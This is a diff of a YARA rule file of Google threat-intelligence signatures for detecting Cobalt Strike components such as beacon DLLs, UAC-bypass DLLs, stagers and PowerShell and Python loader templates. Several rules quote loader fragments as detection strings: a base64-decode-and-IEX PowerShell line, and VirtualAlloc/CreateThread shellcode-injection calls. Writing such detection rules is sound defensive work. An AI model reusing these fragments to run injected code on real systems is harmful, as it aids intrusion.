 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "b490eeb95d150530b8e155da5d7ef778543836a03cb5c27767f1ae4265449a8d"
-		logic_hash = "e1fe0d58d86ad8c845d65608314007ce08e3e524fb92cdb33ddae860c640e3e9"
+		hash = "40fc605a8b95bbd79a3bd7d9af73fbeebe3fada577c99e7a111f6168f6a0d37a"
+		logic_hash = "437706c808bca28384a6e8e24fa3ae120a4ebe4166fa4ca3564c58b881fb23a8"
 		score = 75
 		quality = 85
 		tags = ""
-		rs2 = "a93647c373f16d61c38ba6382901f468247f12ba8cbe56663abb2a11ff2a5144"
 
 	strings:
-		$version_sig = { 48 57 8B F2 83 F8 3D 0F 87 83 02 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
-		$version3_1_sig = { 55 8B EC 83 EC 58 A1 [4] 33 C5 89 45 FC E8 DF F5 FF FF 6A 50 8D 45 A8 50 FF 15 [4] 8D 45 ?? 50 FF 15 [4] 85 C0 74 14 8B 40 0C 83 38 00 74 0C 8B 00 FF 30 FF 15 [4] EB 05 B8 [4] 8B 4D FC 33 CD E8 82 B7 00 00 C9 }
+		$payloadDecoder = { 8B [2] 89 ?? 03 [2] 8B [2] 03 [2] 0F B6 18 8B [2] 89 ?? C1 ?? 1F C1 ?? 1E 01 ?? 83 ?? 03 29 ?? 03 [2] 0F B6 00 31 ?? 88 ?? 8B [2] 89 ?? 03 [2] 8B [2] 03 [2] 0F B6 12 }
 
 	condition:
-		$version_sig and $decoder and not $version3_1_sig
+		any of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_3
+rule GCTI_Cobaltstrike_Resources_Artifact32_V3_1_And_V3_2
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.3"
+		description = "Cobalt Strike's resources/artifact32{.dll,.exe,svc.exe,big.exe,big.dll,bigsvc.exe} and resources/artifact32uac(alt).dll signature for versions 3.1 and 3.2"
 		author = "gssincla@google.com"
-		id = "7cce26c9-1403-535f-bd9d-19667c7e313c"
+		id = "4fff7f42-9f50-5945-8ec0-2438ac5c7000"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L530-L560"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L34-L60"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "158dba14099f847816e2fc22f254c60e09ac999b6c6e2ba6f90c6dd6d937bc42"
-		logic_hash = "f9b9b669aacc156a4e07eab0c6a638f9b9d828e018d1db89e9e2c922641744ac"
+		hash = "4f14bcd7803a8e22e81e74d6061d0df9e8bac7f96f1213d062a29a8523ae4624"
+		logic_hash = "7a0d33d0260c762b4aa67e4084d7474338c60aa684fd3e622614745d90350da8"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 57 8B F1 83 F8 41 0F 87 F0 02 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
+		$decoderFunc = { 89 ?? B? 04 00 00 00 99 F7 FF 8B [2] 8A [2] 30 ?? 8A ?? 4? 88 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_4
+rule GCTI_Cobaltstrike_Resources_Artifact32_V3_14_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.4"
+		description = "Cobalt Strike's resources/artifact32{.dll,.exe,big.exe,big.dll,bigsvc.exe} signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x and resources/artifact32uac.dll for v3.14 and v4.0"
 		author = "gssincla@google.com"
-		id = "58a34ab6-c061-59a2-b929-8519d3d844e7"
+		id = "8a010305-dce5-55f4-b2dd-a736721efe22"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L562-L592"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L62-L89"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "5c40bfa04a957d68a095dd33431df883e3a075f5b7dea3e0be9834ce6d92daa3"
-		logic_hash = "f3372bc538092e30c62d9599f76f2115dc73faf7a5fd6f86c8d4cfaa35473810"
+		hash = "888bae8d89c03c1d529b04f9e4a051140ce3d7b39bc9ea021ad9fc7c9f467719"
+		logic_hash = "fc5c353c568e33df80fa5bab14d11112ca211e269043b83dba8b7d1a6a008a7b"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 57 8B F1 83 F8 42 0F 87 F0 02 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$pushFmtStr = {	C7 [3] 5C 00 00 00 C7 [3] 65 00 00 00 C7 [3] 70 00 00 00 C7 [3] 69 00 00 00 C7 [3] 70 00 00 00 F7 F1 C7 [3] 5C 00 00 00  C7 [3] 2E 00 00 00 C7 [3] 5C 00 00 00 }
+		$fmtStr = "%c%c%c%c%c%c%c%c%cMSSE-%d-server"
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_5_Hf1_And_3_5_1
+rule GCTI_Cobaltstrike_Resources_Bypassuac_X64_Dll_V3_3_To_V3_14_And_Sleeve_Bypassuac_X64_Dll_V4_0_And_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.5-hf1 and 3.5.1 (3.5.x)"
+		description = "Cobalt Strike's resources/bypassuac-x64.dll from v3.3 to v3.14 (64-bit version) and sleeve/bypassuac.x64.dll from v4.0 to at least v4.4"
 		author = "gssincla@google.com"
-		id = "1532596e-be0e-58c2-8d3b-5120c793d677"
+		id = "eef83901-63d9-55a3-b115-03f420416177"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L594-L625"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuac_x64_Dll_v3_3_to_v3_14_and_Sleeve_Bypassuac_x64_Dll_v4_0_and_v4_x.yara#L17-L86"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "c78e70cd74f4acda7d1d0bd85854ccacec79983565425e98c16a9871f1950525"
-		logic_hash = "c2e975678815638803b04261d46bca216bc0b2f894a1f72fd0d5b949493401d1"
+		hash = "9ecf56e9099811c461d592c325c65c4f9f27d947cbdf3b8ef8a98a43e583aecb"
+		logic_hash = "d76e3601f61ae164a8df9048d59d15cd6913e64adb93132244e83f40bf67d86a"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 57 8B F1 83 F8 43 0F 87 07 03 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$deleteFileCOM = {
+			48 8B [5]
+			45 33 ??
+			48 8B ??
+			FF 90 90 00 00 00
+			85 C0
+			75 ??
+			48 8B [5]
+			48 8B ??
+			FF 92 A8 00 00 00
+			85 C0
+		}
+		$copyFileCOM = {
+			48 8B [5]
+			4C 8B [5]
+			48 8B [5]
+			48 8B ??
+			4C 8B ??
+			48 89 [3]
+			FF 90 80 00 00 00
+			85 C0
+			0F 85 [4]
+			48 8B [5]
+			48 8B 11
+			FF 92 A8 00 00 00
+		}
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_6
+rule GCTI_Cobaltstrike_Resources_Template_Py_V3_3_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.6"
+		description = "Cobalt Strike's resources/template.py signature for versions v3.3 to v4.x"
 		author = "gssincla@google.com"
-		id = "7e7b5c22-82b3-5298-b794-b06d94a668d5"
+		id = "16aef9a9-b217-5462-93dc-f6273c99ddd0"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L627-L657"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Py_v3_3_to_v4_x.yara#L17-L36"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "495a744d0a0b5f08479c53739d08bfbd1f3b9818d8a9cbc75e71fcda6c30207d"
-		logic_hash = "3bd3f0b8625e131726fa92d68de041dae6c3d5642cbf22ac596d1d82da1d4a07"
+		hash = "d5cb406bee013f51d876da44378c0a89b7b3b800d018527334ea0c5793ea4006"
+		logic_hash = "3c26cea4b8f2b200bf58e939ae9ead7a7339d4ec0de8c72b3d9c7da897600081"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 57 8B F9 83 F8 47 0F 87 2F 03 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$arch = "platform.architecture()"
+		$nope = "WindowsPE"
+		$alloc = "ctypes.windll.kernel32.VirtualAlloc"
+		$movemem = "ctypes.windll.kernel32.RtlMoveMemory"
+		$thread = "ctypes.windll.kernel32.CreateThread"
+		$wait = "ctypes.windll.kernel32.WaitForSingleObject"
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_7
+rule GCTI_Cobaltstrike_Resources_Reverse_Bin_V2_5_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.7"
+		description = "Cobalt Strike's resources/reverse.bin signature for versions 2.5 to 4.x"
 		author = "gssincla@google.com"
-		id = "6352a31c-34b8-5886-8e34-ef9221c22e6e"
+		id = "182dbcd0-1180-5516-abe3-cf2eebbd0e39"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L659-L689"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Reverse_Bin_v2_5_through_v4_x.yara#L17-L104"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "f18029e6b12158fb3993f4951dab2dc6e645bb805ae515d205a53a1ef41ca9b2"
-		logic_hash = "6ceb2cec8402a4679bad42d367156c74e897af4188442fdebc70d6ce2dd78bd6"
+		hash = "887f666d6473058e1641c3ce1dd96e47189a59c3b0b85c8b8fccdd41b84000c7"
+		logic_hash = "c6c4fc477c7654ec07eb6ef4c6d53805a9b4881ba288754e1f50b3e4b134333c"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 57 8B F9 83 F8 49 0F 87 47 03 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$apiLocator = {
+			31 ??
+			AC
+			C1 ?? 0D
+			01 ??
+			38 ??
+			75 ??
+			03 [2]
+			3B [2]
+			75 ??
+			5?
+			8B ?? 24
+			01 ??
+			66 8B [2]
+			8B ?? 1C
+			01 ??
+			8B ?? 8B
+			01 ??
+			89 [3]
+			5?
+			5?
+		}
+		$ws2_32 = {
+			5D
+			68 33 32 00 00
+			68 77 73 32 5F
+		}
+		$connect = {
+			6A 10
+			5?
+			5?
+			68 99 A5 74 61
+		}
 
 	condition:
-		all of them
+		$apiLocator and $ws2_32 and $connect
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_8
+rule GCTI_Cobaltstrike_Resources_Covertvpn_Dll_V2_1_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.8"
+		description = "Cobalt Strike's resources/covertvpn.dll signature for version v2.2 to v4.4"
 		author = "gssincla@google.com"
-		id = "f76712a4-df1c-5e6b-b5ac-9c74f2e202fc"
+		id = "a65b855c-5703-5b9f-bb57-da8ebf898f9b"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L691-L731"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Covertvpn_Dll_v2_1_to_v4_x.yara#L17-L120"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "67b6557f614af118a4c409c992c0d9a0cc800025f77861ecf1f3bbc7c293d603"
-		logic_hash = "a0c78dd7cda055bc76a8661b0416a302d7b05d03eeea483d2d1695093cd6dc90"
+		hash = "0a452a94d53e54b1df6ba02bc2f02e06d57153aad111171a94ec65c910d22dcf"
+		logic_hash = "1f6e4254fdfd4f9b13c2000333aabbb7da90d2df7ee1b12faa6ea3c066351468"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 57 8B F9 83 F8 4B 0F 87 5D 03 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
-		$xmrig_srcpath = "C:/Users/SKOL-NOTE/Desktop/Loader/script.go"
-		$c2_1 = "ns7.softline.top" xor
-		$c2_2 = "ns8.softline.top" xor
-		$c2_3 = "ns9.softline.top" xor
+		$dropComponentsAndActivateDriver_prologue = {
+			5?
+			68 [4]
+			68 [4]
+			C7 [3-5] 00 00 00 00
+			FF 15 [4]
+			50
+			FF 15 [4]
+			8B ??
+			85 ??
+			74 ??
+			8D [3-5]
+			5?
+			FF 15 [4]
+			50
+		}
+		$dropFile = {
+			6A 00
+			5?
+			E8 [4]
+			83 C4 08
+			83 F8 FF
+			74 ??
+			5?
+			[0-5]
+			E8 [4]
+			83 C4 ??
+			[0-2]
+			6A 00
+			68 80 01 00 00
+			6A 02
+			6A 00
+			6A 05
+			68 00 00 00 40
+			5?
+			FF 15 [4]
+			8B ??
+			83 ?? FF
+			75 ??
+			FF 15 [4]
+			5?
+		}
+		$nfp = "npf.sys" nocase
+		$wpcap = "wpcap.dll" nocase
 
 	condition:
-		$version_sig and $decoder and not ( 2 of ( $c2_* ) or $xmrig_srcpath )
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_11
+rule GCTI_Cobaltstrike_Resources_Command_Ps1_V2_5_To_V3_7_And_Resources_Compress_Ps1_V3_8_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.11"
+		description = "Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x"
 		author = "gssincla@google.com"
-		id = "00e42396-db81-5d43-90ee-5a97b379019e"
+		id = "c0b81deb-ed20-5f7e-8e15-e6a9e9362594"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-22"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L739-L770"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x.yara#L17-L33"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "2428b93464585229fd234677627431cae09cfaeb1362fe4f648b8bee59d68f29"
-		logic_hash = "24ca0a9c2249d1872a53dc228234bdc6803bdfe9e80847995e0951184a8d935c"
+		hash = "932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62"
+		logic_hash = "31cf47060757b086d325cd205724a7be8931bbbc6ff2f4be67a6179ee99c42ca"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 57 8B FA 83 F8 50 0F 87 11 03 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$ps1 = "$s=New-Object \x49O.MemoryStream(,[Convert]::\x46romBase64String(" nocase
+		$ps2 = "));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();" nocase
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_11_Bugfix_And_V3_12
+rule GCTI_Cobaltstrike_Resources_Bypassuactoken_X64_Dll_V3_11_To_V3_14
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.11-bugfix and 3.12"
+		description = "Cobalt Strike's resources/bypassuactoken.x64.dll from v3.11 to v3.14 (64-bit version)"
 		author = "gssincla@google.com"
-		id = "08ff2a2f-97bd-5839-b414-d67fbf2cdb0f"
+		id = "c89befcd-a622-5947-9ce3-a6031901a45a"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L772-L804"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuactoken_x64_Dll_v3_11_to_v3_14.yara#L17-L118"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "5912c96fffeabb2c5c5cdd4387cfbfafad5f2e995f310ace76ca3643b866e3aa"
-		logic_hash = "566eb14f918ad422d5a273390263e63ac37b00cd10ac3561e038fb1a27f85d80"
+		hash = "853068822bbc6b1305b2a9780cf1034f5d9d7127001351a6917f9dbb42f30d67"
+		logic_hash = "adfd212f2e470f666ab8a2168e976c11d3032c31dab7cf56963dae5fc0f6c5f9"
 		score = 75
 		quality = 85
 		tags = ""
-		rs2 = "4476a93abe48b7481c7b13dc912090b9476a2cdf46a1c4287b253098e3523192"
 
 	strings:
-		$version_sig = { 48 57 8B FA 83 F8 50 0F 87 0D 03 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$isHighIntegrityProcess = {
+			83 ?? 7A
+			75 ??
+			8B [3]
+			33 ??
+			FF 15 [4]
+			44 [4]
+			8D [2]
+			48 8B ??
+			48 8D [3]
+			48 8B ??
+			4C 8B ??
+			48 89 [3]
+			FF 15 [4]
+			85 C0
+			74 ??
+			48 8B ??
+			FF 15 [4]
+			8D [2]
+			8A ??
+			40 [2]
+			0F B6 D1
+			48 8B 0F
+			FF 15 [4]
+			81 ?? 00 30 00 00
+		}
+		$executeTaskmgr = {
+			44 8D ?? 70
+			48 8D [3]
+			E8 [4]
+			83 [3] 00
+			48 8D [5]
+			0F 57 ??
+			66 0F 7F [3]
+			48 89 [3]
+			48 8D [5]
+			48 8D [3]
+			C7 [3] 70 00 00 00
+			C7 [3] 40 00 00 00
+			48 89 [3]
+			FF 15
+		}
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_13
+rule GCTI_Cobaltstrike_Resources_Xor_Bin__64Bit_V3_12_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.13"
+		description = "Cobalt Strike's resource/xor64.bin signature for version 3.12 through 4.x"
 		author = "gssincla@google.com"
-		id = "98dd32e6-9bb5-57b2-a5e5-1c74a0d1e6d3"
+		id = "5bb465ee-3bbd-5bfe-8b63-1f243de217bc"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L806-L836"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Xor_Bin__64bit_v3_12_to_4_x.yara#L17-L38"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "362119e3bce42e91cba662ea80f1a7957a5c2b1e92075a28352542f31ac46a0c"
-		logic_hash = "adafac8692ad676b0168b3e829bc7948db72953b95c79d483ae1a05f1d4f9b2b"
+		hash = "01dba8783768093b9a34a1ea2a20f72f29fd9f43183f3719873df5827a04b744"
+		logic_hash = "aabaad09408ae292a0bbc678c334f9f54364b4f6b882846072c303bf826fc2da"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 4A 56 57 83 FA 5A 0F 87 2D 03 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$stub58 = {fc e8 ?? ?? ?? ?? [1-32] eb 33 5? 8b ?? 00 4? 83 ?? ?4 8b ?? 00 31 ?? 4? 83 ?? ?4 5? 8b ?? 00 31 ?? 89 ?? 00 31 ?? 4? 83 ?? ?4 83 ?? ?4 31 ?? 39 ?? 74 ?2 eb e7 5? fc 4? 83 ?? f0 ff}
+		$stub59 = {fc e8 ?? ?? ?? ?? [1-32] eb 2e 5? 8b ??    48 83 c? ?4 8b ??    31 ?? 48 83 c? ?4 5? 8b ??    31 ?? 89 ??    31 ?? 48 83 c? ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e9 5?    48 83 ec ?8 ff e? e8 cd ff ff ff}
+		$stub63 = {fc e8 ?? ?? ?? ?? [1-32] eb 32 5d 8b ?? ?? 48 83 c5 ?4 8b ?? ?? 31 ?? 48 83 c5 ?4 55 8b ?? ?? 31 ?? 89 ?? ?? 31 ?? 48 83 c5 ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e7 5?    48 83 ec ?8 ff e? e8 c9 ff ff ff}
 
 	condition:
-		all of them
+		any of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_14
+rule GCTI_Cobaltstrike_Resources_Smbstager_Bin_V2_5_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.14"
+		description = "Cobalt Strike's resources/smbstager.bin signature for versions 2.5 to 4.x"
 		author = "gssincla@google.com"
-		id = "00edfc72-c7b8-5100-8275-ae3548b96e49"
+		id = "074b7d83-e3d8-541c-804b-2417c21f54d5"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L838-L866"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Smbstager_Bin_v2_5_through_v4_x.yara#L17-L95"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "254c68a92a7108e8c411c7b5b87a2f14654cd9f1324b344f036f6d3b6c7accda"
-		logic_hash = "6faed2b69647b87d86d46ae73ad92cfe7b2746c306cd7480dc9f0c484c8882e2"
+		hash = "946af5a23e5403ea1caccb2e0988ec1526b375a3e919189f16491eeabc3e7d8c"
+		logic_hash = "b0f6535069df16a64de44ca0638ec060c1ff264a7820c94710d61ca7e8474450"
 		score = 75
 		quality = 85
 		tags = ""
-		rs2 = "87b3eb55a346b52fb42b140c03ac93fc82f5a7f80697801d3f05aea1ad236730"
 
 	strings:
-		$version_sig = { 83 FA 5B 77 15 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$apiLocator = {
+			31 ??
+			AC
+			C1 ?? 0D
+			01 ??
+			38 ??
+			75 ??
+			03 [2]
+			3B [2]
+			75 ??
+			5?
+			8B ?? 24
+			01 ??
+			66 8B [2]
+			8B ?? 1C
+			01 ??
+			8B ?? 8B
+			01 ??
+			89 [3]
+			5?
+			5?
+		}
+		$smb = { 68 C6 96 87 52 }
+		$smbstart = {
+			6A 40
+			68 00 10 00 00
+			68 FF FF 07 00
+			6A 00
+			68 58 A4 53 E5
+		}
 
 	condition:
-		all of them
+		$apiLocator and $smb and $smbstart
 }
-rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_0_Suspected
+rule GCTI_Cobaltstrike_Resources_Template__X32_X64_Ps1_V1_45_To_V2_5_And_V3_11_To_V3_14
 {
 	meta:
-		description = "Cobalt Strike's sleeve/beacon.dll Versions 4.0 (suspected, not confirmed)"
+		description = "Cobalt Strike's resources/template.x64.ps1, resources/template.x32 from v3.11 to v3.14 and resources/template.ps1 from v1.45 to v2.5 "
 		author = "gssincla@google.com"
-		id = "50ff6e44-ebc0-5000-a816-b385a6675768"
+		id = "c9fa6a39-0098-5dde-9762-94bc6b2df299"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L868-L901"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template__x32_x64_Ps1_v1_45_to_v2_5_and_v3_11_to_v3_14.yara#L17-L43"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "e2b2b72454776531bbc6a4a5dd579404250901557f887a6bccaee287ac71b248"
-		logic_hash = "6875099bc6df26f829f9f64e70bd7fdac6ac7b83a5596fc9359c127fef4e6db5"
+		hash = "ff743027a6bcc0fee02107236c1f5c96362eeb91f3a5a2e520a85294741ded87"
+		logic_hash = "5196f111f257239d2e7e4ca342e7fc8bac1687743bc8c7ff23addf1f094b2e93"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 51 4A 56 57 83 FA 62 0F 87 8F 03 00 00 FF 24 95 56 7B 00 10 }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
+		$importVA = "[DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc" nocase
+		$importCT = "[DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread" nocase
+		$importWFSO = "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject" nocase
+		$compiler = "New-Object Microsoft.CSharp.CSharpCodeProvider" nocase
+		$params = "New-Object System.CodeDom.Compiler.CompilerParameters" nocase
